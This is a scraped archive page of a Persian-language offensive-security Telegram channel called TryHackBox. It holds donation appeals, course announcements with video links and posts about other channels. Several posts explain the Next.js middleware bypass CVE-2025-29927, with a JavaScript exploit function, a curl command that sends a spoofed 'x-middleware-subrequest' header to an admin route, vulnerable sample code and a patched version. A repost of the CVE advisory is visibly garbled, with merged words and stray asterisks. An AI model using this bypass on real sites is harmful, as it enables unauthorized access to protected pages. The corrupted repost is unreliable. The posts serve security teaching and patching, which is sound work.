en
Feedback
Try Hack Box

Try Hack Box

Open in Telegram

1 Nov 2020 1399/08/11 🔴 THB | Offensive Security آموزش، تحقیق و تجربه عملی در امنیت تهاجمی Penetration Testing · Red Teaming · AI Security 🎯 یاد بگیر. آزمایش کن. حرفه‌ای شو.

Show more
6 487
Subscribers
+424 hours
+607 days
+11530 days
Posts Archive
اول از همه، صمیمانه از بازخورد صادقانه‌تون ممنونم. هر نظری چه موافق چه مخالف برام ارزشمنده چون بهمون کمک می‌کنه مسیر بهتری رو انتخاب کنیم. 🔍 بگذارید واضح‌تر صحبت کنیم: 1. هدف ما همیشه آموزش باکیفیت بوده و هست 2. آزمایش اخیر فقط یه سنجش ساده بود - نه درخواست کمک مالی .‼️ 3. نتایج به ما نشون داد مخاطبان حرفه‌ای واقعاً ارزش کار رو می‌دونن 💡 تصمیم جدیدمون رو دوباره شفاف بیان می‌کنم:محتوای رایگان باکیفیت ادامه داره (همونطور که تا الان بود) ✅ ورژن حرفه‌ای‌تر با امکانات بیشتر به زودی میاد ✅ به همه اعضای فعلی تخفیف ویژه میدیم برای دوره های پولی، چون قدردان همراهی‌تون هستیم یادمون نره:ما یه تیم هستیم که روزانه یا در هفته ساعتی رو وقت می‌ذاریم ✨ هدفمون تربیت هکرهای اخلاقیه نه فروش دوره به هر قیمتی! ✨ همه تصمیماتمون برای بهبود کیفیت آموزش‌هاست ⭕️ امسال وبینارهایی هم خواهیم داشت . ممنون که باهامون صبور هستید و بهمون اعتماد کردید. **با افتخار، تیم TryHackBox** @TryHackBox

درود به خانواده بزرگ TryHackBox امروز می‌خواهم صادقانه و بدون تعارف درباره یک آزمایش جالب با شما صحبت کنم. 🔍 آزمایش اخیر من:  - لینک دونیتی قرار دادم تا ببینم آیا مخاطبانم ارزش واقعی محتوای رایگان را درک می‌کنند.  - نتیجه؟ متأسفانه کمتر از حد انتظار بود اما چرا این نتیجه مهمه؟  💡 درسی که گرفتم:  1. ارزش واقعی با رایگان بودن سنجیده نمی‌شود  2. مخاطبان حرفه‌ای حاضرند برای آموزش باکیفیت سرمایه‌گذاری کنند  3. وقتی چیزی رایگان باشد، بسیاری فراموش می‌کنند که پشت آن ساعت‌ها تلاش و تخصص وجود دارد  ⭕ تصمیم جدید ما:  - از این پس آموزش‌های حرفه‌ای‌تر را در قالب دوره‌های سازمان‌یافته ارائه خواهیم داد  - برای اعضای وفادار (که دونیت کردن) تخفیف‌های ویژه در نظر می‌گیریم  - محتوای رایگان ادامه خواهد داشت ، اما سطح پیشرفته‌تر مخصوص دوره‌های حرفه‌ای خواهد بود  ✨ به خانواده حرفه‌ای‌ها اعتماد دارم:  می‌دانم کسانی که واقعاً به رشد خود متعهد هستند، ارزش این آموزش‌ها را می‌دانند. این تغییر نه از سر ناچاری، که برای ارائه خدمات حرفه‌ای‌تر و هدفمندتر است.  همراه شما هستیم تا رشد کنید ! با تشکر . @TryHackBox

درود دوستان عزیز اگر از آموزش‌های ما استفاده می‌کنید و دوست دارید از تلاش ما حمایت کنید، می‌توانید از طریق لینک زیر کمک کوچکی
درود دوستان عزیز اگر از آموزش‌های ما استفاده می‌کنید و دوست دارید از تلاش ما حمایت کنید، می‌توانید از طریق لینک زیر کمک کوچکی به ما داشته باشید ❤:  https://daramet.com/TryHackBox راستش را بخواهید، من همیشه از درخواست دونیت راحت نبودم، اما شرایطی پیش آمده که مجبورم این را امتحان کنم. امیدوارم شما دوستان درک کنید.  ممنون که همراه ما هستید. 

درود دوستان عزیز اگر از آموزش‌های ما استفاده می‌کنید و دوست دارید از تلاش ما حمایت کنید، می‌توانید از طریق لینک زیر کمک کوچکی به ما داشته باشید ❤:  https://daramet.com/TryHackBox راستش را بخواهید، من همیشه از درخواست دونیت راحت نبودم، اما شرایطی پیش آمده که مجبورم این را امتحان کنم. امیدوارم شما دوستان درک کنید.  ممنون که همراه ما هستید. 

دوستان درحال راه اندازی لابراتور برای شما هستم و درگیر ترجمه یک کتاب که به زودی قرار میگیره برای همین ممکنه فعلا پست آموزشی نباشه با تشکر از صبر شما .

دوستان ما بخشی رو راه اندازی کردیم به اسم رادیو زیرو پاد که در اینجا فعلا داستان هایی که قرار میدیم رو برای شما به صورت پادکست در اوردیم و اگر استقبال خوبی بشه بقیه موارد هم به پادکست اضافه می شود . درحال حاضر میتوانید داستان هایی که قرار دادیم را به طور پادکست پلی کنید و لذت ببرید . @RadioZeroPod

🧩 کانال های دیگر ما : 🔆 در اینجا رودمپ های مختلف میزاریم و یکسری منابع : ➖➖➖➖➖➖➖➖➖➖ 🆔 @TryHackBoxOfficial ➖➖➖➖➖➖➖➖➖➖ 🔆 در اینجا هم داستان مربوط هک و مهندسی اجتماعی و اوسینت میزاریم : ➖➖➖➖➖➖➖➖➖➖ 🆔 @TryHackBoxStory ➖➖➖➖➖➖➖➖➖➖

کانال های دیگر ما : @TryHackBoxOfficial @TryHackBoxStory

تحلیل Limitless OSINT Challenges - تمرین‌های پیشرفته جمع‌آوری اطلاعات آزاد معرفی Limitless OSINT Challenges یک مجموعه تمرین عملی برای متخصصان و علاقه‌مندان به جمع‌آوری اطلاعات از منابع آزاد (OSINT) است که در وبسایت http://limitless-osint.com/challenges ارائه شده است. #Osint @TryHackBox

دوستان میتوانید اینجا از اکسپلویت ها و ابزارها و CVE های دیگر و مقالات مختلف که قرار میگیرد استفاده کنید : @PfkSecurity

دوستان میتوانید اینجا از اکسپلویت ها و ابزارها و CVE های دیگر و مقالات مختلف که قرار میگیرد استفاده کنید : @PfkSecurity

نمونه کد اکسپلویت
async function exploit(targetUrl, protectedRoute) {
  const headers = new Headers();
  headers.append('x-middleware-subrequest', '1');
  
  const response = await fetch(`${targetUrl}${protectedRoute}`, {
    headers: headers
  });
  
  return response.status === 200;
}
راهکارهای اصلاح ارتقاء نسخه: استفاده از نسخه‌های اصلاح شده Next.js میان‌افزار اصلاح شده:
export function middleware(request) {
  // بررسی منشأ درخواست
  const isInternalRequest = request.headers.get('x-verified-internal') === 'true';
  
  // فقط برای درخواست‌های داخلی اجازه رد شدن بدهد
  if (request.headers.get('x-middleware-subrequest') && !isInternalRequest) {
    return new Response('Invalid request', { status: 400 });
  }

  // ادامه منطق احراز هویت
}
راهکارهای دفاعی: پیاده‌سازی بررسی‌های احراز هویت در سطح صفحه استفاده از کوکی‌های امنیتی با HttpOnly و SameSite Strict لاگ‌گیری از درخواست‌های حاوی هدر مشکوک این آسیب‌پذیری نمونه‌ای از مشکل اعتماد نابجا (Overreliance on Client-Supplied Headers) است. سیستم Middleware Next.js به صورت پیش‌فرض به هدرهای ارسالی توسط کلاینت اعتماد کرده بود، بدون آنکه مکانیسمی برای تأیید صحت آنها وجود داشته باشد. این مشکل در معماری سیستم‌های مبتنی بر Middleware رایج است، چرا که توسعه‌دهندگان اغلب فرض می‌کنند که برخی هدرها فقط توسط سیستم داخلی قابل استفاده هستند @TryHackBox

مکانیزم آسیب‌پذیری این آسیب‌پذیری مربوط به رفتار نادرست سیستم Middleware در Next.js هنگام پردازش هدر x-middleware-subrequest است. این هدر به صورت داخلی توسط Next.js برای جلوگیری از حلقه‌های بازگشتی (recursive loops) در درخواست‌های Middleware استفاده می‌شود. کد آسیب‌پذیر (شبیه‌سازی):
// middleware.js (نسخه‌های آسیب‌پذیر)
export function middleware(request) {
  const isSubRequest = request.headers.get('x-middleware-subrequest');
  
  if (isSubRequest) {
    return NextResponse.next();
  }

  // بررسی‌های احراز هویت
  if (!isAuthenticated(request)) {
    return new Response('Unauthorized', { status: 401 });
  }

  return NextResponse.next();
}
نحوه سوءاستفاده مهاجم می‌تواند با اضافه کردن هدر جعلی به درخواست‌های خود، Middleware را دور بزند:
curl -H "x-middleware-subrequest: 1" https://victim.com/admin
@TryHackBox

#CVE-2025-29927 در فریم‌ورک Next.js React یک آسیب‌پذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص می‌تواند برای دور زدن بررسی‌های احراز هویت مورد سوءاستفاده قرار گیرد. این آسیب‌پذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS دارد. Next.js از هدر داخلی x-middleware-subrequest برای جلوگیری از ایجاد حلقه‌های بی‌نهایت در درخواست‌های بازگشتی استفاده می‌کند. با این حال، رد شدن اجرای Middleware باعث می‌شود درخواست‌ها بتوانند بررسی‌های حیاتی، از جمله اعتبارسنجی کوکی‌های احراز هویت، قبل از رسیدن به مسیرهای موردنظر را دور بزنند. این مشکل در نسخه‌های ۱۲.۳.۵، ۱۳.۵.۹، ۱۴.۲.۲۵ و ۱۵.۲.۳ برطرف شده است. به عنوان راهکار موقت، توصیه می‌شود از پردازش درخواست‌های کاربران خارجی که حاوی هدر x-middleware-subrequest هستند، جلوگیری شود. راشد علام (با نام‌های مستعار zhero و cold-try )، محققی که این آسیب‌پذیری را کشف و گزارش کرد، جزئیات فنی بیشتری را افشا کرده است. بنابراین، توصیه می‌شود هرچه سریع‌تر پچ های امنیتی اعمال شوند. به گفته JFrog، این باگ به مهاجمان اجازه می‌دهد به راحتی بررسی‌های احراز هویت در Middleware ی Next.js را دور بزنند که ممکن است منجر به دسترسی به صفحات حساس وب‌سایت (مخصوص مدیران یا کاربران با دسترسی بالا) شود. همچنین هشدار داده شده که هر وب‌سایتی که از Middleware برای کنترل دسترسی کاربران بدون بررسی‌های اضافی استفاده می‌کند، در معرض این آسیب‌پذیری (CVE-2025-29927) قرار دارد و مهاجمان می‌توانند به منابع غیرمجاز دسترسی پیدا کنند. @TryHackBox

⭕ | #CVE-2025-29927 در فریم‌ورک Next.js React یک آسیب‌پذیری امنیتی بحرانی شناسایی شده است که تحت شرایط خاص می‌تواند برای بایپس کردن بررسی‌های احراز هویت مورد سوءاستفاده قرار گیرد. این آسیب‌پذیری با شناسه CVE-2025-29927 ردیابی شده و امتیاز ۹.۱ از ۱۰ در مقیاس CVSS دارد. Next.js از هدر داخلی **x-middleware-subrequest** برای جلوگیری از ایجاد حلقه‌های بی‌نهایت در درخواست‌های بازگشتی استفاده می‌کند. با این حرد شدن اجرای Middlewarere** باعث می‌شود درخواست‌ها بتوانند بررسی‌های حیاتی، از جمله اعتبارسکوکی‌های احراز هویتیت**، قبل از رسیدن به مسیرهای موردنظر را دور بزنند. این مشکل در نسخه‌۱۲.۳.۵۱۳.۵.۹۱۴.۲.۲۵۲۵*۱۵.۲.۳.۳** برطرف شده است. به عنوان راهکار موقت، توصیه می‌شود از پردازش درخواست‌های کاربران خارجی که حاوی هدر **x-middleware-subrequest** هستند، جلوگیری راشد علامد علام** (با نام‌هایzhero*zhcold-tryld-try**)، محققی که این آسیب‌پذیری را کشف و گزارش کرد، جزئیات فنی بیشتری را افشا کرده است. بنتوصیه می‌شود هرچه سریع‌تر پچ های امنیتی اعمال شوندل شوند**. JFrog*JFrog**، این باگ به مهاجمان اجازه می‌دهد به راحتی بررسی‌های احراز Middlewareleware**ی Next.js را دور بزنند که ممکن است منجر به دسترسی به صفحات حساس وب‌سایت (مخصوص مدیران یا کاربران با دسترسی بالا) شود. همچنین هشدار داده شده که هر وب‌سایتMiddlewareleware** برای کنترل دسترسی بدون بررسی‌های اضافی اضافی** استفاده می‌کند، در معرض این آسیبCVE-2025-29927-29927**) قرار دارد و مهاجمان می‌توانند به منابع غیرمجاز دسترسی پیدا کنند. @TryHackBox

دوستان این لوگو رو اندازشو کسی میتونه بزرگتر کنه بنظرم خیلی ریز دیده میشه ی سایزی که اندازه پروفایل کانال بشه هرکس میتونه پیام بده : @Unique_exploitbot

دوستان از این بعد لوگوی ما این خواهد بود و در مقالات و کتابها از این لوگو استفاده خواهیم کرد

دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما : @Unique_exploitbot

#جلسه_پنجم دوره #رایگان سکوریتی پلاس | Security + بخش : ادامه رمزنگاری دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت
#جلسه_پنجم دوره #رایگان سکوریتی پلاس | Security + بخش : ادامه رمزنگاری دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیاده‌سازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش می‌دهد. قسمت اول :   https://youtu.be/Hn5qheOVz6Q قسمت دوم : https://youtu.be/R8Qzq0qQm3Q قسمت سوم : https://youtu.be/bE1KSm7U8uE قسمت چهارم : https://youtu.be/wOFhAGvFCSA قسمت پنجم : https://youtu.be/7xhLSLB79EI
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیت‌تری ارائه بدیم،امیدواریم از آموزش لذت ببرید.
---------- 🆔 @TryHackBox ----------